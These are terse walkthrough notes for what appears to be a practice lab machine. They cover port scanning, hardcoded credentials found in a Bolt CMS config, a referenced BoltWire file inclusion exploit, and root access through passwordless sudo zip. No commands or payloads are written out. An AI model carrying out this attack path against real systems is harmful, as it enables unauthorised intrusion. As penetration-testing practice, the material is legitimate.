Machine Info
IP Address: 192.168.48.132
MAC Address: 00:0c:29:a9:5c:06
Recon
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Bolt — Installation error
2049/tcp open nfs_acl 3 (RPC #100227)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
42117/tcp open mountd 1–3 (RPC #100005)
45341/tcp open nlockmgr 1–4 (RPC #100021)
50659/tcp open mountd 1–3 (RPC #100005)
54355/tcp open mountd 1–3 (RPC #100005
Bolt appears to be a CMS program
There was also a PHP info page on the 8080 port that was open
Found a few directories on the web page that look interesting
The list of Vendor’s and their src code may be useful
Application Config files visible
config.yml seems to have some credentials hardcoded
8080 appears to only have 1 subfolder (/dev)
The /Dev page appears to be a login portal
Not much info on RPC
There is an NFS folder, so let's see if we can connect to it
Found a potential user
Exploit Research
BoltWIRE CMS Local File Inclusion
https://www.exploit-db.com/exploits/48411
Appears to need authenication, Lets see if we can login
Potentially found our JP user
Privilege Escalation
JeanPaul can run the ZIP command with no passwd, ZIP runs as root
GTFO Bins has published a method to exploit this vulnerability
It was successful and we have root privilege
